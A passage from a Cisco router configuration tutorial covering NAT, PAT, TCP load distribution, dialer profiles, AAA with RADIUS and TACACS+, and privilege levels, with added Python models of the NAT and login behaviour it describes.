used, where important nodes, such as servers, will have a static entry, as this guarantees
them an address, while other nodes, which are less important, will be granted a dynamic
translation. This also aids security as the important devices can run enhanced security and
monitoring software, which might not be possible on lower-level devices, which are
typically administered on a daily basis by non-IT personnel.
Static addresses are also useful in translating network topologies from one network
address structure to another, or even when individual nodes are moved from one subnet to
another.
An example of configuring a static translation for a node with the address 192.168.10.10 to the
address 180.10.11.1:
RouterA(config)#ip nat inside source static 192.168.10.10 180.10.11.1

This can then be applied to the inside and outside interfaces with:
RouterA(config)#interface e0
RouterA(config-if)#ip nat inside
RouterA(config-if)#interface s0
RouterA(config-if)#ip nat outside

NAT allows organisations to quickly remap their addresses, as conditions require, such as
changing Internet access provider, or to respond to a network breach.


One of the advanced features of NAT routers is their ability to use Port Address
Translation (PAT), which allows multiple inside addresses to map to the same global
address. This is sometimes called a many-to-one NAT, or address overloading. With address
overloading, many privately addressed nodes can access the Internet using a single global
address. The NAT router keeps track of the different conversations by mapping TCP and
UDP port numbers in the translation table. A translation entry is one which maps one IP
address and port pair to another, and is called an extended table entry. This table will match
internal private IP addresses and ports, to the global address.
The NAT command is used to configure PAT with:
RouterA(config)#ip nat inside source list access-list-number pool name overload

For example, if a network has 20 IP global addresses from 180.10.11.1 to 180.10.11.20, then
the router could be configured with:
RouterA(config)#ip nat pool org_pat_pool 180.10.11.1 180.10.11.20 netmask 255.255.255.0
RouterA(config)#access-list 2 permit 10.1.1.0 0.0.0.255
RouterA(config)#ip nat inside source list 2 pool org_pat_pool overload
RouterA(config)#interface e 0
RouterA(config-if)#ip nat inside
RouterA(config-if)#interface s 0
RouterA(config-if)#ip nat outside

This creates an access-list with a label of 2, which is applied using the overload method, to
provide PAT. This method is obviously important in a home network, where users are
granted an IP address for their router. The home network can then be setup with private
addresses.
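As an added example (not code from NetworkSims or Cisco), the following Python model replays the translation table of Figures 2 and 3 together with a static mapping of the kind used in Challenge 71: outbound packets create extended entries, replies are translated back, unsolicited inbound packets to the overloaded address are dropped, a static entry is reachable without any prior outbound traffic, and entries expire after the configured timeout. The access list, the static mapping, the outside probe addresses and the timeout are constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Model of a NAT router running static translation plus PAT ("overload").
# Added example, not NetworkSims or Cisco code; addresses, ports and timeout are constructed.


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def acl_permits(network: str, wildcard: str, ip: str) -> bool:
    """'access-list N permit network wildcard': bits set in the wildcard are 'don't care'."""
    n, w, a = (int(ipaddress.IPv4Address(x)) for x in (network, wildcard, ip))
    mask = ~w & 0xFFFFFFFF
    return a & mask == n & mask


class NatRouter:
    def __init__(self, global_ip: str, acl: Tuple[str, str],
                 timeout: int = 86400, first_port: int = 5555):
        self.global_ip = global_ip          # the single inside global address being overloaded
        self.acl = acl                      # (network, wildcard) of 'ip nat inside source list'
        self.timeout = timeout              # 'ip nat translation timeout' (default 24 h)
        self.next_port = first_port
        self.static: Dict[str, str] = {}    # inside local -> inside global, permanent
        # extended entries: global port -> (local ip, local port, peer ip, peer port, last use)
        self.table: Dict[int, Tuple[str, int, str, int, int]] = {}

    def add_static(self, local_ip: str, global_ip: str) -> None:
        """ip nat inside source static local global"""
        self.static[local_ip] = global_ip

    def _expire(self, now: int) -> None:
        for gport, entry in list(self.table.items()):
            if now - entry[4] > self.timeout:
                del self.table[gport]

    def outbound(self, pkt: Packet, now: int) -> Packet:
        """Inside -> outside. Static hosts keep their port; listed hosts get an overload entry."""
        self._expire(now)
        if pkt.src_ip in self.static:
            return Packet(self.static[pkt.src_ip], pkt.src_port, pkt.dst_ip, pkt.dst_port)
        if not acl_permits(self.acl[0], self.acl[1], pkt.src_ip):
            return pkt                      # not in the access list: forwarded untranslated
        conv = (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        for gport, entry in self.table.items():
            if entry[:4] == conv:           # existing conversation: reuse its global port
                self.table[gport] = conv + (now,)
                return Packet(self.global_ip, gport, pkt.dst_ip, pkt.dst_port)
        gport, self.next_port = self.next_port, self.next_port + 1
        self.table[gport] = conv + (now,)
        return Packet(self.global_ip, gport, pkt.dst_ip, pkt.dst_port)

    def inbound(self, pkt: Packet, now: int) -> Optional[Packet]:
        """Outside -> inside. Returns the translated packet, or None when it is dropped."""
        self._expire(now)
        for local_ip, g_ip in self.static.items():
            if pkt.dst_ip == g_ip:          # static entry: reachable without prior outbound traffic
                return Packet(pkt.src_ip, pkt.src_port, local_ip, pkt.dst_port)
        if pkt.dst_ip != self.global_ip:
            return None
        entry = self.table.get(pkt.dst_port)
        if entry is None or entry[2:4] != (pkt.src_ip, pkt.src_port):
            return None                     # unsolicited, or from a different peer: no entry
        self.table[pkt.dst_port] = entry[:4] + (now,)
        return Packet(pkt.src_ip, pkt.src_port, entry[0], entry[1])


def demo_pat() -> dict:
    """Replays Figures 2/3: 192.168.10.12 behind 168.10.34.21 talks to WWW server 11.22.33.44."""
    nat = NatRouter("168.10.34.21", ("192.168.10.0", "0.0.0.255"), timeout=3600)
    nat.add_static("192.168.10.50", "168.10.34.50")   # constructed static mapping
    out1 = nat.outbound(Packet("192.168.10.12", 4444, "11.22.33.44", 80), now=0)
    out2 = nat.outbound(Packet("192.168.10.12", 4445, "11.22.33.44", 80), now=1)
    reply = nat.inbound(Packet("11.22.33.44", 80, "168.10.34.21", out1.src_port), now=2)
    probe = nat.inbound(Packet("203.0.113.9", 40000, "168.10.34.21", 5555), now=3)
    static_in = nat.inbound(Packet("203.0.113.9", 40000, "168.10.34.50", 443), now=3)
    stale = nat.inbound(Packet("11.22.33.44", 80, "168.10.34.21", out1.src_port), now=5000)
    return {"out1": out1, "out2": out2, "reply": reply, "probe": probe,
            "static_in": static_in, "stale": stale}


if __name__ == "__main__":
    for name, value in demo_pat().items():
        print(name, value)
```

The probe to port 5555 from an address the inside host never spoke to is dropped, while the same outside address reaches the statically mapped host straight away, which is the "does not hide the host" weakness of static NAT described earlier.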

Cisco Router Challenge 72


Outline
This challenge involves the configuration of NAT overload.
Objectives
The objectives of this challenge are to:

Define an overloaded NAT.
Define an access-list to identify the traffic to be translated.
Apply NAT on E0 and S0 interfaces.
Example
> en
# config t
(config)# access-list 7 permit 195.11.220.0 31.255.255.255
(config)# ip nat pool mynatpool 150.122.41.99 150.122.41.150 netmask 255.255.255.0
(config)# ip nat inside source list 7 pool mynatpool overload
(config)# int e0
(config-if)# ip nat inside
(config-if)# int s0
(config-if)# ip nat outside

Explanation
NAT overload is used when more addresses are required than are in the pool. In this case:
(config)# access-list 7 permit 195.11.220.0 31.255.255.255

identifies the traffic that will be translated for NAT, while:
(config)# ip nat pool mynatpool 150.122.41.99 150.122.41.150 netmask 255.255.255.0

defines the pool of addresses that will be used. As NAT overload is used, many more
internal addresses can be mapped to this pool. Finally, NAT overload is defined
with:
(config)# ip nat inside source list 7 pool mynatpool overload

With NAT overload, the device overloads the first address. Once it reaches its limit of
overloading, the device moves on to the second address, and so on.

Cisco Router Challenge 73


Outline
This challenge involves the configuration of NAT overload without an address pool.
Objectives
The objectives of this challenge are to:

Define an overloaded NAT, and define the port for the external address.
Define an access-list to identify the traffic to be translated.
Apply NAT on E0 and S0 interfaces.

Example
> en
# config t
(config)# access-list 8 permit 195.11.220.0 31.255.255.255
(config)# ip nat inside source list 8 interface s0 ?
overload Overload an address translation
<cr>
(config)# ip nat inside source list 8 interface s0 overload
(config)# int e0
(config-if)# ip nat inside
(config-if)# int s0
(config-if)# ip nat outside

Explanation
NAT overload without a pool is used where there is only a single address to be used, which
is borrowed from the external interface. In this case:
(config)# access-list 8 permit 195.11.220.0 31.255.255.255

identifies the traffic that will be translated, and NAT overload is then defined with:
(config)# ip nat inside source list 8 interface s0 overload

where the address on the S0 interface is used as the external address. Thus all of the internal
addresses will be translated to the single external address as traffic passes from inside the
network to the outside. This is often the case for a home network, which typically has only a
single address for the network connection.

Cisco Router Challenge 74


Outline
This challenge involves the configuration of TCP load distribution for NAT.
Objectives
The objectives of this challenge are to:

Define a TCP load distribution.
Define an access-list to identify the traffic to be translated.
Apply NAT on E0 and S0 interfaces.

Example
> en
# config t
(config)# access-list 7 permit host 195.11.220.2
(config)# ip nat pool globalnat 208.132.69.7 208.132.69.57 netmask 255.255.192.0 ?
  type  Specify the pool type
  <cr>
(config)# ip nat pool globalnat 208.132.69.7 208.132.69.57 netmask 255.255.192.0 type ?
  match-host  Keep host numbers the same after translation
  rotary      Rotary address pool
(config)# ip nat pool globalnat 208.132.69.7 208.132.69.57 netmask 255.255.192.0 type rotary
(config)# ip nat inside destination list 7 pool globalnat
(config)# int e0
(config-if)# ip nat inside
(config-if)# int s0
(config-if)# ip nat outside

Explanation
TCP Load Distribution is used where there is a pool of servers, and the NAT translation
assigns the mapping to one of these, in order to even the load. The command:
(config)# ip nat pool globalnat 208.132.69.7 208.132.69.57 netmask 255.255.192.0 type rotary

defines that the addresses should be assigned from the pool in rotation. For example the
translations would be:

      Inside Local    Inside Global
1st:  208.132.69.7 <- 195.11.220.2
2nd:  208.132.69.8 <- 195.11.220.2
3rd:  208.132.69.9 <- 195.11.220.2

and so on. Thus when the first connection comes in for the address of 195.11.220.2, it will be
translated to 208.132.69.7, the second to 208.132.69.8. Thus each of the servers will have a
more equal loading. The following command defines a dynamic destination translation
(where normally NAT would translate from a source node in the inside network):
(config)# ip nat inside destination list 7 pool globalnat
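As an added example (not NetworkSims or Cisco code), the following Python model of the rotary pool shows the round-robin assignment described above, that an established connection stays on the server it was first given, and that the 51-address pool wraps back to 208.132.69.7. It assumes that only TCP connections to the virtual address 195.11.220.2 are distributed; the client addresses are constructed.

```python
import ipaddress
from typing import Dict, Optional, Tuple

# Model of 'ip nat pool ... type rotary' used by 'ip nat inside destination list'.
# Added example, not NetworkSims or Cisco code; pool addresses are those of the challenge,
# the client endpoints are constructed.


class RotaryPool:
    """Hands out the real servers 208.132.69.7 .. .57 in turn for new TCP connections to
    the virtual address 195.11.220.2 (access-list 7 permit host 195.11.220.2). An existing
    connection stays on the server it was first given, so a session is never split."""

    def __init__(self, virtual_ip: str, start: str, end: str):
        self.virtual_ip = virtual_ip
        first, last = ipaddress.IPv4Address(start), ipaddress.IPv4Address(end)
        self.servers = [str(ipaddress.IPv4Address(i)) for i in range(int(first), int(last) + 1)]
        self.next_index = 0
        # (client ip, client port) -> real server: the dynamic destination entries
        self.table: Dict[Tuple[str, int], str] = {}

    def translate(self, proto: str, client: Tuple[str, int], dst_ip: str) -> Optional[str]:
        """Return the real server for this packet, or None when NAT leaves it alone.
        Assumption (see lead-in): only TCP to the virtual address is distributed."""
        if proto != "tcp" or dst_ip != self.virtual_ip:
            return None
        server = self.table.get(client)
        if server is None:                  # new connection: next server in rotation
            server = self.servers[self.next_index]
            self.next_index = (self.next_index + 1) % len(self.servers)
            self.table[client] = server
        return server


def demo_rotary() -> Dict[str, object]:
    pool = RotaryPool("195.11.220.2", "208.132.69.7", "208.132.69.57")
    first = pool.translate("tcp", ("203.0.113.10", 40001), "195.11.220.2")
    second = pool.translate("tcp", ("203.0.113.11", 40002), "195.11.220.2")
    third = pool.translate("tcp", ("203.0.113.12", 40003), "195.11.220.2")
    again = pool.translate("tcp", ("203.0.113.10", 40001), "195.11.220.2")   # same flow
    udp = pool.translate("udp", ("203.0.113.10", 40001), "195.11.220.2")     # not distributed
    for port in range(50000, 50048):        # 48 more new connections exhaust the 51 entries
        pool.translate("tcp", ("203.0.113.20", port), "195.11.220.2")
    wrapped = pool.translate("tcp", ("203.0.113.21", 60000), "195.11.220.2")
    return {"first": first, "second": second, "third": third, "again": again,
            "udp": udp, "servers": len(pool.servers), "wrapped": wrapped}


if __name__ == "__main__":
    print(demo_rotary())
```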

Cisco Router Challenge 75



Outline
This challenge involves the configuration of NAT for overlapping networks.
Objectives
The objectives of this challenge are to:

Define an overloaded NAT.
Define an access-list to identify the traffic to be translated.
Apply NAT on E0 and S0 interfaces.

Example
> en
# config t
(config)# access-list 7 permit 195.11.220.0 31.255.255.255
(config)# ip nat pool mynatpool 150.122.41.99 150.122.41.150 netmask 255.255.255.0
(config)# ip nat pool yournatpool 140.12.41.99 140.22.41.150 netmask 255.255.255.0
(config)# ip nat inside source list 7 pool mynatpool
(config)# ip nat outside source list 7 pool yournatpool
(config)# int e0
(config-if)# ip nat inside
(config-if)# int s0
(config-if)# ip nat outside

Cisco Router Challenge 76


Outline
This challenge involves the configuration of a dialer profile.
Objectives
The objectives of this challenge are to:

Define the interface for Dialer0.
Define encapsulation and authentication.
Define dialer details.


Example
> en
# config t
(config)# int dialer0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# description test link
(config-if)# encapsulation ppp
(config-if)# ppp authentication chap
(config-if)# dialer remote-name temp
(config-if)# dialer idle-timeout 100
(config-if)# dialer fast-idle 80
(config-if)# dialer string 2221111
(config-if)# dialer pool 1
(config-if)# dialer-group 1
(config-if)# int bri0
(config-if)# dialer pool-member 1

Cisco Router Challenge 77


Outline
This challenge involves the configuration of a dialer profile with a map-class.
Objectives
The objectives of this challenge are to:

Define a dialer map-class.
Define the interface for Dialer0.
Define encapsulation and authentication.
Define dialer details.

Example
> en
# config t
(config)# map-class dialer kirkcaldy
(config-map-class)# dialer fast-idle 15
(config-map-class)# dialer idle-timeout 60
(config-map-class)# exit
(config)# int dialer0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# description test link
(config-if)# encapsulation ppp
(config-if)# ppp authentication chap
(config-if)# dialer remote-name temp
(config-if)# dialer string 2221111 class kirkcaldy
(config-if)# dialer pool 1
(config-if)# dialer-group 1
(config-if)# int bri0
(config-if)# dialer pool-member 1

Explanation
In the previous example (Challenge 75), the following was used:
(config)# int dialer0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# description test link
(config-if)# encapsulation ppp
(config-if)# ppp authentication chap
(config-if)# dialer remote-name temp
(config-if)# dialer idle-timeout 100
(config-if)# dialer fast-idle 80
(config-if)# dialer string 2221111
(config-if)# dialer pool 1
(config-if)# dialer-group 1
(config-if)# int bri0
(config-if)# dialer pool-member 1

In order to allow reuse, a map-class can be created for the characteristics of the dialer string,
such as:
(config)# map-class dialer kirkcaldy
(config-map-class)# dialer fast-idle 15
(config-map-class)# dialer idle-timeout 60
(config-map-class)# exit

and can be applied onto the dialer string with:
(config-if)# dialer string 2221111 class kirkcaldy

Cisco Router Challenge 108


Outline
This challenge involves the configuration of a local server for AAA.


Objectives
The objectives of this challenge are to:

Define AAA.
Define the local server.

Example
> enable
# config t
(config)# aaa new-model
(config)# aaa authentication login default local
(config)# username fred password bert
(config)# username fred1 password bert2

Cisco Router Challenge 109


Outline
This challenge involves the configuration of a RADIUS server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the radius server.

Example
> enable
# config t
(config)# aaa new-model
(config)# radius-server ?
  attribute           Customize selected radius attributes
  authorization       Authorization processing information
  challenge-noecho    Data echoing to screen is disabled during Access-Challenge
  configure-nas       Attempt to upload static routes and IP pools at startup
  deadtime            Time to stop using a server that doesn't respond
  directed-request    Allow user to specify radius server to use with `@server'
  domain-stripping    Strip the domain from the username
  host                Specify a RADIUS server
  key                 encryption key shared with the radius servers
  local               Configure local RADIUS server
  optional-passwords  The first RADIUS request can be made without requesting a password
  retransmit          Specify the number of retries to active server
  timeout             Time to wait for a RADIUS server to reply
  unique-ident        Higher order bits of Acct-Session-Id
  vsa                 Vendor specific attribute configuration
(config)# radius-server host 39.100.234.1
(config)# radius-server key ?
LINE Text of shared key
(config)# radius-server key krinkle
(config)# aaa ?
  accounting      Accounting configurations parameters.
  authentication  Authentication configurations parameters.
  authorization   Authorization configurations parameters.
  configuration   Authorization configuration parameters.
  nas             NAS specific configuration
  new-model       Enable NEW access control commands and functions.(Disables OLD commands.)
  processes       Configure AAA background processes
(config)# aaa authentication ?
  arap             Set authentication lists for arap.
  banner           Message to use when starting login/authentication.
  enable           Set authentication list for enable.
  fail-message     Message to use for failed login/authentication.
  login            Set authentication lists for logins.
  nasi             Set authentication lists for NASI.
  password-prompt  Text to use when prompting for a password
  ppp              Set authentication lists for ppp.
  username-prompt  Text to use when prompting for a username
(config)# aaa authentication login ?
  WORD     Named authentication list.
  default  The default authentication list.
(config)# aaa authentication login default ?
  enable      Use enable password for authentication.
  group       Use Server-group
  line        Use line password for authentication.
  local       Use local username authentication.
  local-case  Use case-sensitive local username authentication.
  none        NO authentication.
(config)# aaa authentication login default group radius
(config)# aaa authentication ?
  arap             Set authentication lists for arap.
  banner           Message to use when starting login/authentication.
  enable           Set authentication list for enable.
  fail-message     Message to use for failed login/authentication.
  login            Set authentication lists for logins.
  nasi             Set authentication lists for NASI.
  password-prompt  Text to use when prompting for a password
  ppp              Set authentication lists for ppp.
  username-prompt  Text to use when prompting for a username
(config)# aaa authentication ppp ?
  WORD     Named authentication list.
  default  The default authentication list.
(config)# aaa authentication ppp default radius
(config)# aaa authorization ?
  commands         For exec (shell) commands.
  config-commands  For configuration mode commands.
  exec             For starting an exec (shell).
  network          For network services. (PPP, SLIP, ARAP)
  reverse-access   For reverse access connections
(config)# aaa authorization network ?
  WORD     Named authorization list.
  default  The default authorization list.
(config)# aaa authorization network default ?
  enable   Use enable password for authentication.
group
Use Server-group
line
Use line password for authentication.
local
Use local username authentication.
local-case Use case-sensitive local username authentication.
(config)# aaa authorization network default group radius
(config)# aaa authorization exec default group radius

Cisco Router Challenge 110


Outline
This challenge involves the configuration of a Tacacs+ server for AAA.
Objectives
The objectives of this challenge are to:

Define AAA.
Define the Tacacs+ server.

Example
> enable
# config t
(config)# aaa new-model
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key krinkle
(config)# aaa authentication login default group tacacs
(config)# aaa authentication ppp default group tacacs
(config)# aaa authorization network default group tacacs
(config)# aaa authorization exec default group tacacs
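The three AAA challenges above (local database, RADIUS, Tacacs+) each end with a single method in the default login list. What that means at login time is easiest to see by walking the list the way IOS does: a later method is consulted only when the earlier one returns an error (for example no server answered), never when it rejects the credentials. The following is an added example written for this page, not part of the NetworkSims text or simulator; the Environment class (which server groups answer, what users they know) is a constructed fixture, and the parser only understands the `aaa authentication login <list> <method>...` syntax used in the challenges.

```python
import re
from dataclasses import dataclass, field

# Constructed test environment (an assumption of this example, not from the
# challenge): which server groups answer, what they know, and the local
# username database built from 'username ... password ...' lines.
@dataclass
class Environment:
    local_users: dict                                    # username -> password
    enable_secret: str = ""
    group_reachable: dict = field(default_factory=dict)  # "radius" -> True/False
    group_users: dict = field(default_factory=dict)      # "radius" -> {user: pw}

LOGIN_RE = re.compile(r"^\s*aaa authentication login (\S+)\s+(.+?)\s*$")

def parse_login_lists(config: str) -> dict:
    """Return {list_name: [method, ...]} from 'aaa authentication login' lines.
    'group <name>' stays one token so the method order is preserved."""
    lists = {}
    for line in config.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        tokens, methods = m.group(2).split(), []
        while tokens:
            tok = tokens.pop(0)
            if tok == "group" and tokens:
                tok = f"group {tokens.pop(0)}"
            methods.append(tok)
        lists[m.group(1)] = methods
    return lists

def try_method(method: str, user: str, password: str, env: Environment) -> str:
    """Outcome of a single method: PASS, FAIL (credentials rejected) or
    ERROR (the method could not decide, e.g. no server answered)."""
    if method == "none":
        return "PASS"
    if method == "enable":
        return "PASS" if env.enable_secret and password == env.enable_secret else "FAIL"
    if method == "local":        # 'local' matches usernames case-insensitively
        users = {u.lower(): p for u, p in env.local_users.items()}
        return "PASS" if users.get(user.lower()) == password else "FAIL"
    if method == "local-case":   # 'local-case' is case-sensitive
        return "PASS" if env.local_users.get(user) == password else "FAIL"
    if method.startswith("group "):
        group = method.split(None, 1)[1]
        if not env.group_reachable.get(group, False):
            return "ERROR"       # timeout / dead server: the list moves on
        return "PASS" if env.group_users.get(group, {}).get(user) == password else "FAIL"
    raise ValueError(f"unsupported method {method!r}")

def login(methods: list, user: str, password: str, env: Environment) -> tuple:
    """Walk the method list in order. A later method is consulted only when
    the earlier one returned ERROR; FAIL ends the attempt immediately."""
    for method in methods:
        outcome = try_method(method, user, password, env)
        if outcome != "ERROR":
            return outcome, method
    return "ERROR", None         # every method errored: nobody can log in

if __name__ == "__main__":
    env = Environment(local_users={"fred": "bert", "fred1": "bert2"},
                      group_reachable={"radius": False, "tacacs+": False})
    only_radius = parse_login_lists("aaa authentication login default group radius")["default"]
    print("radius only, server down:", login(only_radius, "fred", "bert", env))
    with_fallback = parse_login_lists("aaa authentication login default group tacacs+ local")["default"]
    print("tacacs+ then local:", login(with_fallback, "fred", "bert", env))
```

With the server unreachable, the list `group radius` on its own ends in ERROR for everyone, including the administrator on the console; `group tacacs+ local` falls through to the local database instead. The model also shows that a wrong password against a reachable server is a FAIL, so appending `local` does not give a second try with a different credential.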

Cisco Router Challenge 111


Outline
This challenge involves the configuration of a Tacacs+ server for commands.
Objectives
The objectives of this challenge are to:

Define AAA.
Define privileges.
Define command authorization for a Tacacs+ server.

Example
> enable
# config t
(config)# aaa new-model
(config)# privilege configure level 7 snmp-server host
(config)# privilege configure level 7 snmp-server enable
(config)# privilege configure level 7 snmp-server
(config)# privilege exec level 7 ping
(config)# privilege exec level 7 configure terminal
(config)# privilege exec level 7 configure
(config)# radius-server host 39.100.234.1
(config)# radius-server key krinkle
(config)# aaa authorization commands 0 default group tacacs+
(config)# aaa authorization commands 15 default group tacacs+
(config)# aaa authorization commands 7 default group tacacs+

Explanation
The privilege levels go from level 0 to level 15, such as:

Level 0. This only includes five commands: disable, enable, exit, help and logout.
Level 1. This is the non-privileged mode with a prompt of router>.
Level 15. This is the highest level of privilege, and has a prompt of router#.

Typical Level 1 commands are:

  access-enable    Create a temporary Access-List entry
  clear            Reset functions
  connect          Open a terminal connection
  disable          Turn off privileged commands
  disconnect       Disconnect an existing network connection
  enable           Turn on privileged commands
  exit             Exit from the EXEC
  help             Description of the interactive help system
  lock             Lock the terminal
  login            Log in as a particular user
  logout           Exit from the EXEC
  name-connection  Name an existing network connection
  ping             Send echo messages
  rcommand         Run command on remote switch
  resume           Resume an active network connection
  show             Show running system information
  systat           Display information about terminal lines
  telnet           Open a telnet connection
  terminal         Set terminal line parameters
  traceroute       Trace route to destination
  tunnel           Open a tunnel connection
  where            List active connections

Thus:
(config)# privilege configure level 7 snmp-server host
(config)# privilege configure level 7 snmp-server enable
(config)# privilege configure level 7 snmp-server
(config)# privilege exec level 7 ping
(config)# privilege exec level 7 configure terminal
(config)# privilege exec level 7 configure

moves these commands to Level 7. For example ping is a Level 1 command and is now a
Level 7 command, while the rest have moved from Level 15 to Level 7.
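The re-mapping described in the explanation can be checked mechanically: parse the `privilege <mode> level N <command>` lines and ask which level a given command now needs. The code below is an added example, not NetworkSims material; its default-level table is limited to the Level 0 and Level 1 commands listed on this page, every other command is assumed to default to Level 15, and the matching rule (longest configured keyword prefix wins) is a simplification of IOS behaviour that ignores per-keyword inheritance and the `all` keyword.

```python
import re

# Default levels as given in the challenge text: five Level 0 commands, the
# listed Level 1 EXEC commands, everything else Level 15. Any command not in
# these sets is assumed (by this example) to default to Level 15.
LEVEL0_EXEC = {"disable", "enable", "exit", "help", "logout"}
LEVEL1_EXEC = {"access-enable", "clear", "connect", "disable", "disconnect",
               "enable", "exit", "help", "lock", "login", "logout",
               "name-connection", "ping", "rcommand", "resume", "show",
               "systat", "telnet", "terminal", "traceroute", "tunnel", "where"}

PRIV_RE = re.compile(r"^\s*privilege (exec|configure) level (\d+) (.+?)\s*$")

def default_level(mode: str, command: str) -> int:
    """Level a command needs before any 'privilege' re-mapping."""
    keyword = command.split()[0]
    if mode == "exec" and keyword in LEVEL0_EXEC:
        return 0
    if mode == "exec" and keyword in LEVEL1_EXEC:
        return 1
    return 15            # configure-mode commands are Level 15 by default

def parse_privilege(config: str) -> dict:
    """{mode: [(level, [keyword, ...]), ...]} from 'privilege <mode> level N <cmd>' lines."""
    table = {"exec": [], "configure": []}
    for line in config.splitlines():
        m = PRIV_RE.match(line)
        if m:
            table[m.group(1)].append((int(m.group(2)), m.group(3).split()))
    return table

def required_level(table: dict, mode: str, command: str) -> int:
    """Level needed to run `command` in `mode`. Simplified model: the longest
    configured keyword prefix that matches decides; otherwise the default.
    (IOS's per-keyword handling and the 'all' keyword are not modelled.)"""
    words = command.split()
    best = None
    for level, prefix in table.get(mode, []):
        if words[:len(prefix)] == prefix and (best is None or len(prefix) > len(best[1])):
            best = (level, prefix)
    return best[0] if best else default_level(mode, command)

def can_run(user_level: int, table: dict, mode: str, command: str) -> bool:
    """A user may run any command whose level is at or below their own."""
    return user_level >= required_level(table, mode, command)

# The six 'privilege' commands from the challenge.
CHALLENGE_CONFIG = """
privilege configure level 7 snmp-server host
privilege configure level 7 snmp-server enable
privilege configure level 7 snmp-server
privilege exec level 7 ping
privilege exec level 7 configure terminal
privilege exec level 7 configure
"""

if __name__ == "__main__":
    table = parse_privilege(CHALLENGE_CONFIG)
    for mode, cmd in [("exec", "ping 10.0.0.1"), ("exec", "configure terminal"),
                      ("configure", "snmp-server host 10.0.0.2 public"), ("exec", "telnet 10.0.0.1")]:
        print(f"{mode:9} {cmd:35} default={default_level(mode, cmd):2} now={required_level(table, mode, cmd):2}")
```

Running it reproduces the explanation: `ping` rises from Level 1 to Level 7, `configure terminal` and the `snmp-server` commands drop from Level 15 to Level 7, and a Level 1 user can no longer ping while a Level 7 user can.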

Cisco Router Challenge 112


Outline
This challenge involves the configuration of security of a router.
Objectives
The objectives of this challenge are to:

Define usernames and passwords.


Define privilege levels.
Restrict access of users to a single host.

Example
> enable
# config t
(config)# username fred password bert
(config)# username test nopassword
(config)# username fred privilege 15
(config)# username test privilege 1
(config)# username test user-maxlinks 2
(config)# access-list 9 permit host 192.168.0.1
(config)# username fred access-class 9

Explanation
The privilege levels go from level 0 to level 15, such as:

Level 0. This only includes five commands: disable, enable, exit, help and logout.
Level 1. This is the non-privileged mode with a prompt of router>.
Level 15. This is the highest level of privilege, and has a prompt of router#.

Typical Level 1 commands are:

  access-enable    Create a temporary Access-List entry
  clear            Reset functions
  connect          Open a terminal connection
  disable          Turn off privileged commands
  disconnect       Disconnect an existing network connection
  enable           Turn on privileged commands
  exit             Exit from the EXEC
  help             Description of the interactive help system
  lock             Lock the terminal
  login            Log in as a particular user
  logout           Exit from the EXEC
  name-connection  Name an existing network connection
  ping             Send echo messages
  rcommand         Run command on remote switch
  resume           Resume an active network connection
  show             Show running system information
  systat           Display information about terminal lines
  telnet           Open a telnet connection
  terminal         Set terminal line parameters
  traceroute       Trace route to destination
  tunnel           Open a tunnel connection
  where            List active connections

Thus:
(config)# username fred privilege 15
(config)# username test privilege 1

sets the maximum privilege level for fred at 15, while test will only be able to enter the non-privileged mode. Also:
(config)# access-list 9 permit host 192.168.0.1
(config)# username fred access-class 9

restricts the access for fred to a single host (192.168.0.1), so that the user will not be able to
log in from any other host. The following:
(config)# username test user-maxlinks 2

restricts the number of connections for test to two.
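The per-user controls in this challenge (password or nopassword, privilege, access-class and user-maxlinks) can be combined into one admission decision. The code below is an added example, not part of the NetworkSims text: it parses the seven configuration lines of the challenge plus numbered standard access-lists, then applies the checks in the order a login would meet them. The wildcard-mask handling assumes contiguous masks (0.0.0.255 and the like).

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional

@dataclass
class User:
    name: str
    password: Optional[str] = None
    nopassword: bool = False
    privilege: int = 1            # IOS default for a username without 'privilege'
    maxlinks: Optional[int] = None
    access_class: Optional[int] = None

@dataclass
class Decision:
    allowed: bool
    reason: str
    privilege: Optional[int] = None

def parse_config(config: str) -> tuple:
    """Collect 'username ...' attributes and numbered standard access-lists."""
    users, acls = {}, {}
    for line in config.splitlines():
        t = line.split()
        if not t:
            continue
        if t[0] == "username" and len(t) >= 3:
            u = users.setdefault(t[1], User(t[1]))
            opt, arg = t[2], (t[3] if len(t) > 3 else None)
            if opt == "password":
                u.password = arg
            elif opt == "nopassword":
                u.nopassword = True
            elif opt == "privilege":
                u.privilege = int(arg)
            elif opt == "user-maxlinks":
                u.maxlinks = int(arg)
            elif opt == "access-class":
                u.access_class = int(arg)
        elif t[0] == "access-list" and t[2] in ("permit", "deny"):
            # standard ACL forms: 'host A.B.C.D', 'any', 'A.B.C.D WILDCARD'
            if t[3] == "host":
                net = ipaddress.ip_network(f"{t[4]}/32")
            elif t[3] == "any":
                net = ipaddress.ip_network("0.0.0.0/0")
            else:
                wildcard = int(ipaddress.ip_address(t[4]))   # assumes a contiguous mask
                net = ipaddress.ip_network(f"{t[3]}/{32 - wildcard.bit_length()}", strict=False)
            acls.setdefault(int(t[1]), []).append((t[2], net))
    return users, acls

def acl_permits(entries: list, source: str) -> bool:
    """First matching entry wins; every ACL ends in an implicit deny."""
    ip = ipaddress.ip_address(source)
    for action, net in entries:
        if ip in net:
            return action == "permit"
    return False

def admit(users: dict, acls: dict, name: str, password: Optional[str],
          source: str, active_links: int) -> Decision:
    """Apply the per-user checks the challenge configures, in order."""
    u = users.get(name)
    if u is None:
        return Decision(False, "unknown user")
    if not u.nopassword and password != u.password:
        return Decision(False, "bad password")
    if u.access_class is not None and not acl_permits(acls.get(u.access_class, []), source):
        return Decision(False, f"source {source} blocked by access-class {u.access_class}")
    if u.maxlinks is not None and active_links >= u.maxlinks:
        return Decision(False, f"user-maxlinks {u.maxlinks} already reached")
    return Decision(True, "ok", u.privilege)

# The configuration lines from the challenge.
CHALLENGE_CONFIG = """
username fred password bert
username test nopassword
username fred privilege 15
username test privilege 1
username test user-maxlinks 2
access-list 9 permit host 192.168.0.1
username fred access-class 9
"""

if __name__ == "__main__":
    users, acls = parse_config(CHALLENGE_CONFIG)
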